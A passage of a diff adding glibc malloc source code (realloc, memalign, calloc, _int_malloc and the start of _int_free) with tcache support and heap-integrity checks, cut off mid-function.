+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    __libc_lock_unlock (av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      REMOVE_FB (fb, victim, pp);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (pp = *fb) != NULL)
+		{
+		  REMOVE_FB (fb, tc_victim, pp);
+		  if (tc_victim != 0)
+		    {
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+	if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+              check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        __libc_lock_unlock (av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have let to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  __libc_lock_lock (av->mutex);
+		  locked = 1;
+		  chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    __libc_lock_unlock (av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
